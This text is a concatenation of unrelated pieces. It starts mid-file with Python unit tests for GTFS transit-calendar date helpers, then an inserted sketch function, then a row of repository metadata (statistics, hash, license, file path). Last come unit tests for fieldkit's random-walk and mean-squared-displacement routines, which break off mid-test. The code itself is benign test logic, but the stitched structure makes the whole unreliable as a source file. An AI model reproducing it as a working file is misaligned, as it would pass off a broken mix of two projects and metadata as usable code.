"service_id": ["test_service_id"],
}
)
)
mock_calendar_dates = PropertyMock(
return_value=pd.DataFrame(
{
"date": ["20201010"],
"exception_type": [2],
"service_id": ["test_service_id"],
}
)
)
mock_dataset.__class__ = Feed
type(mock_dataset).calendar = mock_calendar
type(mock_dataset).calendar_dates = mock_calendar_dates
mock_date_type = MagicMock()
mock_date_type.__class__ = str
mock_date_type.__str__.return_value = "end_date"
under_test = get_gtfs_dates_by_type(mock_dataset, str(mock_date_type))
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
mock_calendar.assert_called()
self.assertEqual(mock_calendar.call_count, 2)
mock_calendar_dates.assert_called()
self.assertEqual(mock_calendar_dates.call_count, 2)
def test_get_gtfs_start_dates_from_calendar_with_empty_calendar_should_return_empty_dataframe(
self,
):
test_calendar = pd.DataFrame(
{
"start_date": [],
"monday": [],
"tuesday": [],
"wednesday": [],
"thursday": [],
"friday": [],
"saturday": [],
"sunday": [],
"service_id": [],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
under_test = get_gtfs_start_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
def test_get_gtfs_start_dates_from_calendar_with_filled_calendar_should_return_non_empty_dataframe(
self,
):
test_calendar = pd.DataFrame(
{
"start_date": ["20201010"],
"monday": [1],
"tuesday": [1],
"wednesday": [1],
"thursday": [1],
"friday": [1],
"saturday": [1],
"sunday": [1],
"service_id": ["test_service_date"],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
test_service_ids_list = [
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
]
test_dates_list = [
"20201012",
"20201013",
"20201014",
"20201015",
"20201016",
"20201010",
"20201011",
]
under_test = get_gtfs_start_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertEqual(under_test["service_id"].count(), 7)
self.assertEqual(under_test["service_id"].tolist(), test_service_ids_list)
self.assertEqual(under_test["date"].count(), 7)
self.assertEqual(under_test["date"].tolist(), test_dates_list)
def test_get_gtfs_start_dates_from_calendar_with_mixed_calendar_should_return_non_empty_dataframe(
self,
):
test_calendar = pd.DataFrame(
{
"start_date": ["20201010"],
"monday": [1],
"tuesday": [1],
"wednesday": [1],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [1],
"service_id": ["test_service_date"],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
test_service_ids_list = [
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
]
test_dates_list = ["20201012", "20201013", "20201014", "20201010", "20201011"]
under_test = get_gtfs_start_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertEqual(under_test["service_id"].count(), 5)
self.assertEqual(under_test["service_id"].tolist(), test_service_ids_list)
self.assertEqual(under_test["date"].count(), 5)
self.assertEqual(under_test["date"].tolist(), test_dates_list)
def test_get_gtfs_start_dates_from_calendar_with_invalid_date(
self,
):
test_calendar = pd.DataFrame(
{
"start_date": ["invalid_date"],
"monday": [1],
"tuesday": [1],
"wednesday": [1],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [1],
"service_id": ["test_service_date"],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
under_test = get_gtfs_start_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
test_calendar = pd.DataFrame(
{
"start_date": [1],
"monday": [1],
"tuesday": [1],
"wednesday": [1],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [1],
"service_id": ["test_service_date"],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
under_test = get_gtfs_start_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
def test_get_gtfs_end_dates_from_calendar_with_empty_calendar_should_return_empty_dataframe(
self,
):
test_calendar = pd.DataFrame(
{
"end_date": [],
"monday": [],
"tuesday": [],
"wednesday": [],
"thursday": [],
"friday": [],
"saturday": [],
"sunday": [],
"service_id": [],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
under_test = get_gtfs_end_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
def test_get_gtfs_end_dates_from_calendar_with_filled_calendar_should_return_non_empty_dataframe(
self,
):
test_calendar = pd.DataFrame(
{
"end_date": ["20201010"],
"monday": [1],
"tuesday": [1],
"wednesday": [1],
"thursday": [1],
"friday": [1],
"saturday": [1],
"sunday": [1],
"service_id": ["test_service_date"],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
test_service_ids_list = [
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
]
test_dates_list = [
"20201005",
"20201006",
"20201007",
"20201008",
"20201009",
"20201010",
"20201004",
]
under_test = get_gtfs_end_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertEqual(under_test["service_id"].count(), 7)
self.assertEqual(under_test["service_id"].tolist(), test_service_ids_list)
self.assertEqual(under_test["date"].count(), 7)
self.assertEqual(under_test["date"].tolist(), test_dates_list)
def test_get_gtfs_end_dates_from_calendar_with_mixed_calendar_should_return_non_empty_dataframe(
self,
):
test_calendar = pd.DataFrame(
{
"end_date": ["20201010"],
"monday": [1],
"tuesday": [1],
"wednesday": [1],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [1],
"service_id": ["test_service_date"],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
test_service_ids_list = [
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
]
test_dates_list = ["20201005", "20201006", "20201007", "20201010", "20201004"]
under_test = get_gtfs_end_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertEqual(under_test["service_id"].count(), 5)
self.assertEqual(under_test["service_id"].tolist(), test_service_ids_list)
self.assertEqual(under_test["date"].count(), 5)
self.assertEqual(under_test["date"].tolist(), test_dates_list)
def test_get_gtfs_end_dates_from_calendar_with_invalid_date(
self,
):
test_calendar = pd.DataFrame(
{
"end_date": ["invalid_date"],
"monday": [1],
"tuesday": [1],
"wednesday": [1],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [1],
"service_id": ["test_service_date"],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
under_test = get_gtfs_end_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
test_calendar = pd.DataFrame(
{
"end_date": [1],
"monday": [1],
"tuesday": [1],
"wednesday": [1],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [1],
"service_id": ["test_service_date"],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
under_test = get_gtfs_end_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
@mock.patch("gtfs_kit.feed.Feed")
def test_get_gtfs_timezone_utc_offset_with_invalid_agency_timezone_should_return_default_utc_offset(
self, mock_dataset
):
mock_agency = PropertyMock(
return_value=pd.DataFrame({"agency_timezone": [" test_timezone"]})
)
mock_dataset.__class__ = Feed
type(mock_dataset).agency = mock_agency
test_utc_offset = ""
under_test = get_gtfs_timezone_utc_offset(mock_dataset)
self.assertEqual(under_test, test_utc_offset)
mock_agency = PropertyMock(return_value=pd.DataFrame({"agency_timezone": [0]}))
mock_dataset.__class__ = Feed
type(mock_dataset).agency = mock_agency
test_utc_offset = ""
under_test = get_gtfs_timezone_utc_offset(mock_dataset)
self.assertEqual(under_test, test_utc_offset)
@mock.patch("gtfs_kit.feed.Feed")
def test_get_gtfs_timezone_utc_offset_with_valid_agency_timezone_should_return_timezone_utc_offset(
self, mock_dataset
):
mock_agency = PropertyMock(
return_value=pd.DataFrame({"agency_timezone": ["America/Toronto"]})
)
mock_dataset.__class__ = Feed
type(mock_dataset).agency = mock_agency
test_utc_offset = ["-05:00", "-04:00"]
under_test = get_gtfs_timezone_utc_offset(mock_dataset)
self.assertTrue(under_test in test_utc_offset)
@mock.patch("gtfs_kit.feed.Feed")
def test_get_gtfs_timezone_utc_offset_with_another_agency_timezone_should_return_timezone_utc_offset(
self, mock_dataset
):
mock_agency = PropertyMock(
return_value=pd.DataFrame({"agency_timezone": ["Europe/London"]})
)
mock_dataset.__class__ = Feed
type(mock_dataset).agency = mock_agency
test_utc_offset = ["±00:00", "+01:00"]
under_test = get_gtfs_timezone_utc_offset(mock_dataset)
self.assertTrue(under_test in test_utc_offset)
@mock.patch("gtfs_kit.feed.Feed")
def test_gtfs_stop_times_for_date_with_valid_parameters_should_return_stop_times_dataframe(
self, mock_dataset
):
test_stop_times_trip_ids = ["test_trip_id"]
test_stop_times_departure_time = ["05:00:00"]
test_stop_time_key = "departure_time"
mock_trips = PropertyMock(
return_value=pd.DataFrame(
{"service_id": ["test_service_id"], "trip_id": ["test_trip_id"]}
)
)
mock_stop_times = PropertyMock(
return_value=pd.DataFrame(
{"trip_id": ["test_trip_id"], "departure_time": ["05:00:00"]}
)
)
mock_dataset.__class__ = Feed
type(mock_dataset).trips = mock_trips
type(mock_dataset).stop_times = mock_stop_times
test_dataset_dates = pd.DataFrame(
{
"service_id": [
"test_service_id",
"test_service_id",
"test_service_id",
"test_service_id",
"test_service_id",
"test_service_id",
"test_service_id",
],
"date": [
"20201005",
"20201006",
"20201007",
"20201008",
"20201009",
"20201010",
"20201004",
],
}
)
mock_dataset_dates = MagicMock()
mock_dataset_dates.__class__ = pd.DataFrame
mock_dataset_dates.__getitem__.side_effect = test_dataset_dates.__getitem__
mock_dataset_dates.loc.__getitem__.side_effect = (
test_dataset_dates.loc.__getitem__
)
mock_dataset_dates.items.return_value = test_dataset_dates.items()
mock_date_to_look_up = MagicMock()
mock_date_to_look_up.__class__ = datetime
mock_date_to_look_up.strftime.return_value = "20201010"
under_test = get_gtfs_stop_times_for_date(
mock_dataset, mock_dataset_dates, mock_date_to_look_up, test_stop_time_key
)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue("trip_id" in under_test.columns)
self.assertTrue("departure_time" in under_test.columns)
self.assertEqual(under_test["trip_id"].tolist(), test_stop_times_trip_ids)
self.assertEqual(
under_test["departure_time"].tolist(), test_stop_times_departure_time
)
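# Editor's sketch of the contract the tests above pin down. This is a
# hypothetical stand-in, not utilities.temporal_utils.get_gtfs_dates_by_type:
# the real helper also expands calendar rows across their active weekdays
# (see the start/end-date tests above), which this sketch omits.
import pandas as pd

def gtfs_dates_by_type_sketch(calendar, calendar_dates, date_type):
    empty = pd.DataFrame(columns=["service_id", "date"])
    if date_type not in ("start_date", "end_date"):
        return empty  # None or an unknown type yields an empty frame
    frames = [empty]
    if calendar is not None and date_type in calendar.columns:
        # take the requested boundary date per service
        frames.append(calendar[["service_id", date_type]].rename(columns={date_type: "date"}))
    if calendar_dates is not None:
        # exception_type 1 adds service on a date; type 2 removes it
        added = calendar_dates[calendar_dates["exception_type"] == 1]
        frames.append(added[["service_id", "date"]])
    return pd.concat(frames, ignore_index=True)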
| 36.745127
| 105
| 0.580399
| 2,510
| 24,509
| 5.188446
| 0.049801
| 0.081087
| 0.032097
| 0.036858
| 0.926207
| 0.895723
| 0.885357
| 0.873148
| 0.869001
| 0.859479
| 0
| 0.029183
| 0.313517
| 24,509
| 666
| 106
| 36.8003
| 0.744785
| 0
| 0
| 0.737815
| 0
| 0
| 0.123669
| 0
| 0
| 0
| 0
| 0
| 0.134454
| 1
| 0.030252
| false
| 0
| 0.010084
| 0
| 0.042017
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| cbc02d8e8ef316f961ec52af60742ab843058e71
| 16,602
| py
| Python
| fieldkit/test/test_simulate.py
| djz332/fieldkit
| 3c242c2026e80100cdd6b2114d72a61122381fcd
| ["BSD-3-Clause"]
| null | null | null
| fieldkit/test/test_simulate.py
| djz332/fieldkit
| 3c242c2026e80100cdd6b2114d72a61122381fcd
| ["BSD-3-Clause"]
| null | null | null
| fieldkit/test/test_simulate.py
| djz332/fieldkit
| 3c242c2026e80100cdd6b2114d72a61122381fcd
| ["BSD-3-Clause"]
| null | null | null
""" Unit tests for fieldkit.simulate
"""
import unittest
import numpy as np
import fieldkit
class RandomWalkTest(unittest.TestCase):
""" Test cases for :py:class:`~fieldkit.simulate.random_walk`
"""
def test_one_step(self):
""" Test simple random walk rules for one step.
"""
mesh = fieldkit.Mesh().from_lattice(N=3, lattice=fieldkit.HOOMDLattice(L=3.0))
field = fieldkit.Field(mesh).from_array(np.ones(mesh.shape))
field[:,:,0] = 0
domain = fieldkit.domain.digitize(field, threshold=0.5)
traj,x,im = fieldkit.simulate.random_walk(domain, N=2, steps=1, runs=10)
# check shape of output is OK
self.assertEqual(traj.shape, (10,2,3))
self.assertEqual(x.shape, (2,3))
self.assertEqual(im.shape, (2,3))
# check that all coords are still in box
self.assertTrue(np.all(x >= 0))
self.assertTrue(np.all(x < 3))
# walk cannot enter z = 0
self.assertTrue(np.all(traj[:,:,2] != 0))
# with 10 steps, a particle cannot have traveled more than 3 images
self.assertTrue(np.all(im >= -3))
self.assertTrue(np.all(im < 3))
# check that trajectory is continuous (no step is larger than 1)
# 0->1
self.assertLessEqual(np.max(traj[1]-traj[0]), 1)
self.assertGreaterEqual(np.min(traj[1]-traj[0]), -1)
# 1->2
self.assertLessEqual(np.max(traj[2]-traj[1]), 1)
self.assertGreaterEqual(np.min(traj[2]-traj[1]), -1)
# 2->3
self.assertLessEqual(np.max(traj[3]-traj[2]), 1)
self.assertGreaterEqual(np.min(traj[3]-traj[2]), -1)
# try to restart from last state
traj2,_,_ = fieldkit.simulate.random_walk(domain, N=2, steps=1, runs=1, coords=x, images=im)
# first frame should match old coordinates
np.testing.assert_array_equal(traj2[0], x + im*mesh.shape)
# difference between last old and first new should be 1 step at most
self.assertLessEqual(np.max(traj2[0]-traj[-1]), 1)
self.assertGreaterEqual(np.min(traj2[0]-traj[-1]), -1)
def test_msd(self):
""" Validate random walk with a short simulation, computing the MSD.
The simulation is constructed so that the MSD = 1 for each component after 1 run.
"""
mesh = fieldkit.Mesh().from_lattice(N=10, lattice=fieldkit.HOOMDLattice(L=10.0))
field = fieldkit.Field(mesh).from_array(np.ones(mesh.shape))
domain = fieldkit.domain.digitize(field, threshold=0.5)
# displacement should be consistent with random walk
traj,_,_ = fieldkit.simulate.random_walk(domain, N=4000, steps=3, runs=1000)
window = 3
msd = np.zeros((window+1,3))
samples = np.zeros(window+1, dtype=np.int32)
for i,ri in enumerate(traj[:-1]):
for dt in range(1,min(window+1,traj.shape[0]-i)):
rj = traj[i+dt]
dr = rj-ri
msd[dt] += np.mean(dr*dr,axis=0)
samples[dt] += 1
flags = samples > 0
for ax in range(3):
msd[flags,ax] /= samples[flags]
np.testing.assert_array_almost_equal(msd[0], (0.,0.,0.), decimal=3)
np.testing.assert_array_almost_equal(msd[1], (1.,1.,1.), decimal=3)
np.testing.assert_array_almost_equal(msd[2], (2.,2.,2.), decimal=2)
np.testing.assert_array_almost_equal(msd[3], (3.,3.,3.), decimal=2)
# use compiled code to test farther out
msd_2 = fieldkit.simulate.msd(traj,window=window)
self.assertEqual(msd_2.shape, (window+1,3))
np.testing.assert_array_almost_equal(msd_2[0], (0.,0.,0.), decimal=3)
np.testing.assert_array_almost_equal(msd_2[1], (1.,1.,1.), decimal=3)
np.testing.assert_array_almost_equal(msd_2[2], (2.,2.,2.), decimal=2)
np.testing.assert_array_almost_equal(msd_2[3], (3.,3.,3.), decimal=2)
# both results should be essentially the same
np.testing.assert_array_almost_equal(msd,msd_2)
# use every 2nd origin with a looser tolerance due to lower stats
msd_3 = fieldkit.simulate.msd(traj,window=window,every=2)
self.assertEqual(msd_3.shape, (window+1,3))
np.testing.assert_array_almost_equal(msd_3[0], (0.,0.,0.), decimal=3)
np.testing.assert_array_almost_equal(msd_3[1], (1.,1.,1.), decimal=2)
np.testing.assert_array_almost_equal(msd_3[2], (2.,2.,2.), decimal=2)
np.testing.assert_array_almost_equal(msd_3[3], (3.,3.,3.), decimal=2)
def test_msd_binned(self):
""" Test binned MSD against hand-computed values.
The dummy trajectory is built so each particle has a known, constant per-frame displacement.
"""
# dummy trajectory
traj = np.zeros((4,3,3))
traj[0,:] = [[0,0,0],[-1.9, 0, 0],[1.5,3,7]]
traj[1,:] = [[0.1,2,-1],[-1.8,-1,3],[1.6,4,8]]
traj[2,:] = [[0.2,4,-2],[-1.7,-2,6],[1.7,5,9]]
traj[3,:] = [[0.3,6,-3],[-1.6,-3,9],[1.8,6,10]]
# msd from binned
msd_bin,edges = fieldkit.simulate.msd_binned(traj, window=1, axis=0, bins=8, range=(-2,2))
self.assertEqual(msd_bin.shape, (8,2,3))
self.assertEqual(edges.shape, (9,))
np.testing.assert_array_almost_equal(edges,(-2.,-1.5,-1.0,-0.5,0.,0.5,1.0,1.5,2.0))
# only bins 0, 4, and 7 have particles contributing
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(1.e-2,1.,9.)))
np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.,0.),(1.e-2,4.,1.)))
np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.,0.),(1.e-2,1.,1.)))
# repeat using every other origin, should give identical result
msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=0, bins=8, range=(-2,2), every=2)
self.assertEqual(msd_bin.shape, (8,2,3))
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(1.e-2,1.,9.)))
np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.,0.),(1.e-2,4.,1.)))
np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.,0.),(1.e-2,1.,1.)))
# compute with a range that no particles lie in, should give all zeros
msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=0, bins=1, range=(-1.5,-0.1))
self.assertEqual(msd_bin.shape, (1,2,3))
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(0.,0.,0.)))
# repeat for the window that only the first particle lies in
msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=0, bins=3, range=(0,0.6))
self.assertEqual(msd_bin.shape, (3,2,3))
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(1.e-2,4.,1.)))
np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(1.e-2,4.,1.)))
np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.)))
# roll the trajectory so binning is done along y
traj = np.roll(traj, shift=1, axis=2)
msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=1, bins=8, range=(-2,2))
self.assertEqual(msd_bin.shape, (8,2,3))
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(9.,1.e-2,1.)))
np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.,0.),(1.,1.e-2,4.)))
np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.,0.),(1.,1.e-2,1.)))
# roll again so binning is done along z
traj = np.roll(traj, shift=1, axis=2)
msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=2, bins=8, range=(-2,2))
self.assertEqual(msd_bin.shape, (8,2,3))
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(1.,9.,1.e-2)))
np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.,0.),(4.,1.,1.e-2)))
np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.,0.),(0.,0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.,0.),(1.,1.,1.e-2)))
def test_msd_survival(self):
""" Test survival-weighted binned MSD against hand-computed values.
Reuses the dummy trajectory from test_msd_binned; particles must remain in their bin to contribute.
"""
# dummy trajectory
traj = np.zeros((4,3,3))
traj[0,:] = [[0,0,0],[-1.9, 0, 0],[1.5,3,7]]
traj[1,:] = [[0.1,2,-1],[-1.8,-1,3],[1.6,4,8]]
traj[2,:] = [[0.2,4,-2],[-1.7,-2,6],[1.7,5,9]]
traj[3,:] = [[0.3,6,-3],[-1.6,-3,9],[1.8,6,10]]
# msd from binned
msd_bin,counts,edges = fieldkit.simulate.msd_survival(traj, window=1, axis=0, bins=8, range=(-2,2))
self.assertEqual(msd_bin.shape, (8,2,2))
self.assertEqual(counts.shape, (8,2))
self.assertEqual(edges.shape, (9,))
np.testing.assert_array_almost_equal(edges,(-2.,-1.5,-1.0,-0.5,0.,0.5,1.0,1.5,2.0))
# check counts
np.testing.assert_array_equal(counts[0], (3,3))
np.testing.assert_array_equal(counts[1], (0,0))
np.testing.assert_array_equal(counts[2], (0,0))
np.testing.assert_array_equal(counts[3], (0,0))
np.testing.assert_array_equal(counts[4], (3,3))
np.testing.assert_array_equal(counts[5], (0,0))
np.testing.assert_array_equal(counts[6], (0,0))
np.testing.assert_array_equal(counts[7], (3,3))
# only bins 0, 4, and 7 have particles contributing
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(1.,9.)))
np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.),(4.,1.)))
np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.),(1.,1.)))
# repeat using every other origin, should give identical result
msd_bin,_,_ = fieldkit.simulate.msd_survival(traj, window=1, axis=0, bins=8, range=(-2,2), every=2)
self.assertEqual(msd_bin.shape, (8,2,2))
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(1.,9.)))
np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.),(4.,1.)))
np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.),(1.,1.)))
# compute with a range that no particles lie in, should give all zeros
msd_bin,_,_ = fieldkit.simulate.msd_survival(traj, window=1, axis=0, bins=1, range=(-1.5,-0.1))
self.assertEqual(msd_bin.shape, (1,2,2))
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(0.,0.)))
# roll the trajectory so binning is done along y
traj = np.roll(traj, shift=1, axis=2)
msd_bin,_,_ = fieldkit.simulate.msd_survival(traj, window=1, axis=1, bins=8, range=(-2,2))
self.assertEqual(msd_bin.shape, (8,2,2))
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(9.,1.)))
np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.),(1.,4.)))
np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.),(1.,1.)))
# roll again so binning is done along z
traj = np.roll(traj, shift=1, axis=2)
msd_bin,_,_ = fieldkit.simulate.msd_survival(traj, window=1, axis=2, bins=8, range=(-2,2))
self.assertEqual(msd_bin.shape, (8,2,2))
np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(1.,9.)))
np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.),(4.,1.)))
np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.),(0.,0.)))
np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.),(1.,1.)))
# TODO: test when a particle exits the bin
def test_msd_survival_cylinder(self):
""" Test radially binned MSD."""
# dummy radial and axial coordinates
r = np.zeros((4,3))
r[0,:] = [0.0,1.5,2.5]
r[1,:] = [0.3,1.3,2.5]
r[2,:] = [0.6,1.1,2.5]
r[3,:] = [0.9,1.01,2.5]
# 0 has D = 1, 1 has D = 2, 2 has D = 3
z = np.zeros((4,3))
z[0,:] = [1,-2,0]
z[1,:] = [2,-4,3]
z[2,:] = [3,-6,6]
z[3,:] = [4,-8,9]
# msd from binned
msd_bin,counts,edges = fieldkit.simulate.msd_survival_cylinder(r, z, window=1, bins=4, range=(0,4))
self.assertEqual(msd_bin.shape, (4,2))
self.assertEqual(counts.shape, (4,2))
self.assertEqual(edges.shape, (5,))
np.testing.assert_array_almost_equal(edges,(0,1,2,3,4))
# check counts
np.testing.assert_array_equal(counts[0], (3,3))
np.testing.assert_array_equal(counts[1], (3,3))
np.testing.assert_array_equal(counts[2], (3,3))
np.testing.assert_array_equal(counts[3], (0,0))
# only bins 0, 1, and 2 have particles contributing
np.testing.assert_array_almost_equal(msd_bin[0], (0,1))
np.testing.assert_array_almost_equal(msd_bin[1], (0,4))
np.testing.assert_array_almost_equal(msd_bin[2], (0,9))
np.testing.assert_array_almost_equal(msd_bin[3], (0,0))
# repeat using every other origin, should give identical result
msd_bin,_,_ = fieldkit.simulate.msd_survival_cylinder(r, z, window=1, bins=4, range=(0,4), every=2)
self.assertEqual(msd_bin.shape, (4,2))
np.testing.assert_array_almost_equal(msd_bin[0], (0,1))
